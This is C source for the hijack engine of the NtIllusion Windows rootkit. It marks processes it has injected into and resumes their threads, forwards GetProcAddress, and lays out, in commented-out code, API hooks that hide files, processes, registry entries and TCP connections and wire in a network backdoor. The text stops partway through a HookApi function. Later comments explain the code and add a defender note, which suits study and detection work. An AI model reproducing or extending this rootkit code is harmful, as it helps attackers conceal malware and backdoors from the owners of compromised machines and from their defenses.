/******************************************************************************
  kHijackEng.c	: ROOTKIT *HIJACK ENGINE*
  *****************************************************************************
  Author		: Kdm (Kodmaker@syshell.org)
  WebSite		: http://www.syshell.org

  Copyright (C) 2003,2004 Kdm
  *****************************************************************************
  This file is part of NtIllusion.

  NtIllusion is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License as published by
  the Free Software Foundation; either version 2 of the License, or
  (at your option) any later version.

  NtIllusion is distributed in the hope that it will be useful,
  but WITHOUT ANY WARRANTY; without even the implied warranty of
  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  GNU General Public License for more details.

  You should have received a copy of the GNU General Public License
  along with NtIllusion; if not, write to the Free Software
  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
  ******************************************************************************/

#include <winsock2.h>				// for socket hijack (kNTIFlow.h)
#include <iprtrmib.h>				// for socket hijack (kNTIFlow.h)
#include <windows.h>				// ;)
#include <tlhelp32.h>				// Tool help 32 functions
#include "kHijackEng.h"				// Hijack engine header
#include "../../Misc/kNTIConfig.h"	// Config file
#include "../../Misc/kNTILib.h"		// Internal runtime
#include "../../Misc/kdbg_IAT.h"	// Runtime Debug
#include "kDisAsm/kEPhook.h"


// Replacement functions :
#include "../../Replacements/Registry/kNTIReg.h"	// registry			(hiding)
#include "../../Replacements/Spawning/kNTISpawn.h"	// process spawning (injection)
#include "../../Replacements/Process/kNTIProcess.h"	// process			(hiding)
#include "../../Replacements/Network/kNTINetHide.h"	// network			(hiding)
#include "../../Replacements/Network/kNTIFlow.h"	// network			(backdoor)
#include "../../Replacements/Files/kNTIFiles.h"		// files			(hiding)



// Pointers to the original (non-hijacked) API entry points. They are defined
// in other translation units; presumably HijackApi() stores the real address
// here when it patches an import (see the commented-out calls in
// HijackApiOfNewModule), so that a replacement can forward to the real API
// the way MyGetProcAddress() forwards to fGetProcAddress.
extern FARPROC fRegEnumValueW;		// Unicode
extern FARPROC fGetProcAddress;
extern FARPROC fCreateProcessW;		// Unicode
extern FARPROC fLoadLibrary;		// ANSI
extern FARPROC fNtQuerySystemInformation;
extern FARPROC fWSARecv;
extern FARPROC frecv;
// File enumeration
extern FARPROC fFindFirstFileA;		// ANSI
extern FARPROC fFindNextFileA;		// ANSI
extern FARPROC fFindFirstFileW;		// Unicode
extern FARPROC fFindNextFileW;		// Unicode
// Network
extern FARPROC fGetTcpTable;
extern FARPROC fAllocateAndGetTcpExTableFromStack;
extern FARPROC fDeviceIoControl;
extern FARPROC fCharToOemBuffA;
extern FARPROC fWriteFile;
extern char ExePath[1024+1];		// full path to current injected exe

extern char* kNTIDllName;
// Tool-help / thread APIs. These are not imported statically: WakeUpProcess()
// resolves them from kernel32.dll at run time through fGetProcAddress and
// stores the results here. They are NULL until WakeUpProcess() has run.
FARPROC fCreateToolhelp32Snapshot;
FARPROC nti_fModule32First;
FARPROC nti_fModule32Next;
FARPROC nti_OpenThread;
FARPROC nti_Thread32First;
FARPROC nti_Thread32Next;



// Marks the current process as already injected by writing NTI_SIGNATURE into
// the e_csum (checksum) field of the main module's in-memory IMAGE_DOS_HEADER.
// IsModuleAlreadyHooked() reads the same field back to test the marker.
// No return value: a missing module handle is only logged via OutputString,
// and the return values of both VirtualProtect calls are not checked.
//
// Defender note: the marker is an in-memory modification of the PE header, so
// an e_csum that differs between the mapped image and the file on disk is one
// observable artifact of this engine.
void MarkModuleAsHooked()
{
	PIMAGE_DOS_HEADER pDosHdr=NULL;
	DWORD dwProtect=0, dwNewProtect=0;

	// GetModuleHandle(NULL) is the base address of the process's main image,
	// which begins with the DOS header.
	pDosHdr = (PIMAGE_DOS_HEADER) GetModuleHandle(NULL);
	if(!pDosHdr)
	{
		OutputString("Cannot get Dos header address\n");
		return;
	}

	// Grant write access (unchecked: if this fails, the write below hits a
	// page that is normally mapped read-only)
	VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), PAGE_READWRITE, &dwProtect);
	// Overwrite :)
	pDosHdr->e_csum = NTI_SIGNATURE;
	// Restore previous memory protection (dwProtect is what the first call saved)
	VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD),dwProtect, &dwNewProtect);
}

// Returns 1 if the current process already carries the NTI_SIGNATURE marker
// written by MarkModuleAsHooked(), 0 otherwise (also 0 when the main module
// handle cannot be obtained; that case is logged via OutputString).
// The marker is read from the e_csum field of the main module's in-memory
// IMAGE_DOS_HEADER. The VirtualProtect pair mirrors MarkModuleAsHooked(), but
// requests PAGE_READONLY; neither return value is checked.
int IsModuleAlreadyHooked()
{
	PIMAGE_DOS_HEADER pDosHdr=NULL;
	DWORD dwProtect=0, dwNewProtect=0;
	WORD ntiSign=0;

	// Base address of the main image == its DOS header
	pDosHdr = (PIMAGE_DOS_HEADER) GetModuleHandle(NULL);
	if(!pDosHdr)
	{
		OutputString("Cannot get Dos header address\n");
		return 0;
	}

	// Grant read access (the header page is presumably already readable, so
	// this mainly records the current protection in dwProtect -- TODO confirm)
	VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), PAGE_READONLY, &dwProtect);
	// Read
	ntiSign = pDosHdr->e_csum;
	// Restore previous memory protection
	VirtualProtect((LPVOID)(&(pDosHdr->e_csum)), sizeof(WORD), dwProtect, &dwNewProtect);

	return (ntiSign==NTI_SIGNATURE)? 1 : 0;
}

// Resumes every thread owned by process `pid`. The log message calls it the
// "current process", so callers presumably pass their own PID after the hooks
// are in place in a process that was started suspended -- the caller is not
// visible in this file, so that is an assumption.
//
// OpenThread and the Tool-help snapshot functions are resolved at run time
// through fGetProcAddress (falling back to the real GetProcAddress if the
// hook engine has not saved it yet) and stored in the file-scope nti_* /
// fCreateToolhelp32Snapshot globals.
//
// Returns 1 once the thread walk has completed, 0 if any API could not be
// resolved or the snapshot could not be taken. On the early-return paths the
// kernel32 handle obtained from LoadLibrary is not released (FreeLibrary runs
// only on the success path), and the thread handles returned by OpenThread are
// never closed. The "!OpenThread" failure is reported through
// OutputDebugString while every other message in this file uses OutputString.
int WakeUpProcess(DWORD pid)
{
    HANDLE hSnap, hThread;
	DWORD dPID=pid;
	THREADENTRY32 ThEnt = {0};
	HINSTANCE hInstLib=0;

	OutputString("Waking up current process...\n");

	// Used only as the module base for the dynamic resolves below
	hInstLib = LoadLibrary("kernel32.dll");

	// fGetProcAddress normally holds the saved original entry point; fall
	// back to the statically imported one if it is still NULL
	if(!fGetProcAddress)
	{
		OutputString("!fGetProcAddress  !!.\n");
		fGetProcAddress = (FARPROC) GetProcAddress;
	}

	nti_OpenThread = (FARPROC) fGetProcAddress(hInstLib,"OpenThread");

	if(!nti_OpenThread)
	{
		OutputDebugString("!OpenThread\n");
		return 0;	// hInstLib is not released on this path
	}


	fCreateToolhelp32Snapshot   = (FARPROC) fGetProcAddress(hInstLib,"CreateToolhelp32Snapshot");
	nti_Thread32First			= (FARPROC) fGetProcAddress(hInstLib, "Thread32First");
	nti_Thread32Next			= (FARPROC) fGetProcAddress(hInstLib, "Thread32Next");
	
	if(!fCreateToolhelp32Snapshot || !nti_Thread32First || !nti_Thread32Next)
	{
		OutputString("Resolve failed.\n");
		return 0;	// hInstLib is not released on this path
	}

	// Tool-help requires dwSize to be filled in before the first Thread32First call
	ThEnt.dwSize = sizeof(THREADENTRY32);

	// Per the Tool-help documentation a TH32CS_SNAPTHREAD snapshot covers all
	// threads in the system regardless of the pid argument, which is why the
	// loop below filters on th32OwnerProcessID
	hSnap = (HANDLE) (*fCreateToolhelp32Snapshot)(TH32CS_SNAPTHREAD, dPID);

	if(hSnap == INVALID_HANDLE_VALUE)
	{
		OutputString("CreateToolhelp32Snapshot ERROR\n");
		return 0;	// hInstLib is not released on this path
	}

	if ((*nti_Thread32First)(hSnap, &ThEnt)) 
    { 
        do 
        { 
            if (ThEnt.th32OwnerProcessID == dPID) 
            { 
				// THREAD_SUSPEND_RESUME is the only access right ResumeThread needs
				hThread = (HANDLE) (*nti_OpenThread)(THREAD_SUSPEND_RESUME, FALSE, ThEnt.th32ThreadID);
				if(hThread)
				{
					// Decrements the thread's suspend count by one; hThread is not closed
					ResumeThread(hThread);
				}
            } 
        } 
        while ((*nti_Thread32Next)(hSnap, &ThEnt)); 
    } 
	FreeLibrary(hInstLib);
	CloseHandle(hSnap);
	return 1;
}


// Replacement for kernel32!GetProcAddress (its installation is the
// commented-out HijackApiEx call in HijackApiOfNewModule below).
// The original intent, preserved in the commented-out block inside the body,
// was to answer lookups of hooked API names with the matching My* replacement
// so that code resolving APIs dynamically would still hit the hooks. That
// logic is disabled: the live body is a pure pass-through to the saved
// original pointer fGetProcAddress, and returns whatever it returns.
//
// Parameters are those of GetProcAddress: the module handle and the ANSI
// procedure name (or ordinal) to resolve.
// NOTE: fGetProcAddress has type FARPROC and is invoked here with two
// arguments; this relies on the unprototyped function-pointer call the Win32
// headers permit and is not type-checked by the compiler.
FARPROC WINAPI MyGetProcAddress(HMODULE hModule, LPCSTR lpProcName)
{
/*
	char tmp[256], str[256];	// temp string / non unicode string
	DWORD OldProtect;
	HANDLE hMod;

	//The following lines try to retrieve lpPrcName content whatever its memory protection :
	VirtualProtect((void*)lpProcName, 8, PAGE_EXECUTE_READWRITE, &OldProtect);
	hMod = GetCurrentProcess();
	if(hMod==0)	
		goto end;
	my_memset(tmp, 0, 256);
	my_memset(str, 0, 256);
	// for some reason, lpProcName is sometimes in a locked memory state, in this case, we skip.
	if(!ReadProcessMemory( hMod, (void*)lpProcName, (void*)tmp, 40, 0))	
		goto end;

	//Convert strings from unicode :
	WideCharToMultiByte(CP_ACP, 0,(const unsigned short *)lpProcName, -1, str, 255,NULL, NULL);
	OutputString("GetProcAddress => %s\n", lpProcName);



//	if(!stricmp(lpProcName, "GetProcAddress") || !stricmp(tmp, "GetProcAddress"))
//		return (FARPROC)MyGetProcAddress;


	//if(!stricmp(lpProcName, "CreateProcessW") || !stricmp(tmp, "CreateProcessW"))
	//	return (FARPROC)MyCreateProcessW;

	if(!stricmp(lpProcName, "LoadLibraryA") || !stricmp(tmp, "LoadLibraryA"))
		return (FARPROC)MyLoadLibrary;
	if(!stricmp(lpProcName, "NtQuerySystemInformation") || !stricmp(tmp, "NtQuerySystemInformation"))
		return (FARPROC)MyNtQuerySystemInformation;
	if(!stricmp(lpProcName, "RegEnumValueW") || !stricmp(tmp, "RegEnumValueW"))
		return (FARPROC)MyRegEnumValue;

	if(!stricmp(lpProcName, "FindFirstFileA") || !stricmp(tmp, "FindFirstFileA"))
		return (FARPROC)MyFindFirstFileA;
	if(!stricmp(lpProcName, "FindFirstFileW") || !stricmp(tmp, "FindFirstFileW"))
		return (FARPROC)MyFindFirstFileW;
	if(!stricmp(lpProcName, "FindNextFileA") || !stricmp(tmp, "FindNextFileA"))
		return (FARPROC)MyFindNextFileA;
	if(!stricmp(lpProcName, "FindNextFileW") || !stricmp(tmp, "FindNextFileW"))
		return (FARPROC)MyFindNextFileW;


	if(!stricmp(lpProcName, "GetTcpTable") || !stricmp(tmp, "GetTcpTable"))
		return (FARPROC)MyGetTcpTable;

	if(!stricmp(lpProcName, "AllocateAndGetTcpExTableFromStack") 
		|| !stricmp(tmp, "AllocateAndGetTcpExTableFromStack"))
			return (FARPROC)MyAllocateAndGetTcpExTableFromStack;
end :
*/
	// With the name matching disabled every lookup is treated as a legitimate
	// request and forwarded to the original GetProcAddress unchanged.
  return (FARPROC) fGetProcAddress(hModule, lpProcName);
}
 

// Hook-installation entry point for one module of the current process. The
// name suggests it is called whenever a new module is loaded (presumably from
// the LoadLibrary replacement; the caller is not visible in this file).
// It was meant to delegate each individual API patch to HijackApi() /
// HijackApiEx() and report the outcome through ShowResultOfHijack(). Every
// one of those calls is currently commented out, so the live body patches
// nothing and always returns 1.
//
// Parameters:
//   hLocalModule - module whose imports would be patched
//   ModuleName   - display name, used only by the commented-out log calls
//   ExePath      - path of the host executable. NOTE: this parameter shadows
//                  the file-scope `extern char ExePath[]` declared above.
// Returns 1 unconditionally.
int HijackApiOfNewModule(HMODULE hLocalModule, const char* ModuleName, char *ExePath)
{
	int result;
	result = 0;	// only assigned by the commented-out HijackApi calls; unused in the live body
	//if(VERBOSE_API_LIST) OutputString("\nInspecting '%s' (%s)\n", ModuleName, (char*)ExePath);

	// o Hijack GetProcAddress :
	//result = HijackApiEx((hLocalModule), "KERNEL32.DLL", "GetProcAddress", ((VOID*)&MyGetProcAddress), ((VOID**)&fGetProcAddress));
	//ShowResultOfHijack(result, "GetProcAddress", ExePath, (char*)ModuleName);

	// o Hijack CreateProcessW :
	//result = HijackApiEx((hLocalModule), "kernel32.dll", "CreateProcessW", ((VOID*)&MyCreateProcessW), ((VOID**)&fCreateProcessW));
	//ShowResultOfHijack(result, "CreateProcessW", ExePath, (char*)ModuleName);
/*
	// o Hijack LoadLibraryA :
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "LoadLibraryA", ((VOID*)&MyLoadLibrary), ((VOID**)&fLoadLibrary));
	ShowResultOfHijack(result, "LoadLibraryA", ExePath, (char*)ModuleName);


	// o Hijack NtQuerySystemInformation :
	result = HijackApi((hLocalModule), "NTDLL.DLL", "NtQuerySystemInformation", ((VOID*)&MyNtQuerySystemInformation), ((VOID**)&fNtQuerySystemInformation));
	ShowResultOfHijack(result, "NtQuerySystemInformation", ExePath, (char*)ModuleName);

	// o Hijack RegEnumValueW :
	result = HijackApi((hLocalModule), "ADVAPI32.DLL", "RegEnumValueW", (PVOID)&MyRegEnumValue, (PVOID*)&fRegEnumValueW);
	ShowResultOfHijack(result, "RegEnumValueW", ExePath, (char*)ModuleName);


	// o Hijack recv :
	result = HijackApi((hLocalModule), "wsock32.dll", "recv", (PVOID)&Myrecv, (PVOID*)&frecv);
	ShowResultOfHijack(result, "recv", ExePath, (char*)ModuleName);

	// o Hijack WSARecv :
	result = HijackApi((hLocalModule), "ws2_32.dll", "WSARecv", (PVOID)&MyWSARecv, (PVOID*)&fWSARecv);
	ShowResultOfHijack(result, "WSARecv", ExePath, (char*)ModuleName);


	// o Hijack FindFirstFileA :
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindFirstFileA", (PVOID)&MyFindFirstFileA, (PVOID*)&fFindFirstFileA);
	ShowResultOfHijack(result, "FindFirstFileA", ExePath, (char*)ModuleName);
	
	// o Hijack FindNextFileA :
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindNextFileA", (PVOID)&MyFindNextFileA, (PVOID*)&fFindNextFileA);
	ShowResultOfHijack(result, "FindNextFileA", ExePath, (char*)ModuleName);

	// o Hijack FindFirstFileW :
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindFirstFileW", (PVOID)&MyFindFirstFileW, (PVOID*)&fFindFirstFileW);
	ShowResultOfHijack(result, "FindFirstFileW", ExePath, (char*)ModuleName);
	// o Hijack FindNextFileW :
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "FindNextFileW", (PVOID)&MyFindNextFileW, (PVOID*)&fFindNextFileW);
	ShowResultOfHijack(result, "FindNextFileW", ExePath, (char*)ModuleName);

	
	// o Hijack GetTcpTable :
	result = HijackApi((hLocalModule), "IPHLPAPI.DLL", "GetTcpTable", (PVOID)&MyGetTcpTable, (PVOID*)&fGetTcpTable);
	ShowResultOfHijack(result, "GetTcpTable", ExePath, (char*)ModuleName);

	// o Hijack AllocateAndGetTcpExTableFromStack :
	result = HijackApi((hLocalModule), "IPHLPAPI.DLL", "AllocateAndGetTcpExTableFromStack", (PVOID)&MyAllocateAndGetTcpExTableFromStack, (PVOID*)&fAllocateAndGetTcpExTableFromStack);
	ShowResultOfHijack(result, "AllocateAndGetTcpExTableFromStack", ExePath, (char*)ModuleName);


	// o Hijack DeviceIoControl :
	result = HijackApi((hLocalModule), "kernel32.dll", "DeviceIoControl", (PVOID)&MyDeviceIoControl, (PVOID*)&fDeviceIoControl);
	ShowResultOfHijack(result, "DeviceIoControl", ExePath, (char*)ModuleName);

	// o Hijack CharToOemBuffA :
	result = HijackApi((hLocalModule), "USER32.DLL", "CharToOemBuffA", (PVOID)&MyCharToOemBuff, (PVOID*)&fCharToOemBuffA);
	ShowResultOfHijack(result, "CharToOemBuffA", ExePath, (char*)ModuleName);

	// o Hijack LogonUserA :
	//result = HijackApi((hLocalModule), "ADVAPI32.DLL", "LogonUserA", (PVOID)&MyLogonUser, (PVOID*)&fLogonUser);
	//ShowResultOfHijack(result, "LogonUserA", ExePath, (char*)ModuleName);

	// o Hijack CreateProcessWithLogonW :
	//result = HijackApi((hLocalModule), "ADVAPI32.DLL", "CreateProcessWithLogonW", (PVOID)&MyCreateProcessWithLogonW, (PVOID*)&fCreateProcessWithLogonW);
	//ShowResultOfHijack(result, "CreateProcessWithLogonW", ExePath, (char*)ModuleName);

	// o Hijack WriteFile ?
if( (!WriteFile_FPORT_ONLY) || (WriteFile_FPORT_ONLY && strstr(ExePath,(char*)NTILLUSION_TARGET_FPORT)!=0))
{
	result = HijackApi((hLocalModule), "KERNEL32.DLL", "WriteFile", (PVOID)&MyWriteFile, (PVOID*)&fWriteFile);
	ShowResultOfHijack(result, "WriteFile", ExePath, (char*)ModuleName);
}
*/
	// Reports success regardless of `result`, and even though nothing was patched
	return 1;
}

int HookApi(char* DllName, char* FuncName, DWORD ReplacementFunc, FARPROC* pFunc)
{
  BYTE* CG_Func=NULL;
  FARPROC funcGetProcAddress=NULL;
  int ret=0;

  if(fGetProcAddress==NULL)
	  funcGetProcAddress = (FARPROC)GetProcAddress;
  else
	  funcGetProcAddress = fGetProcAddress;
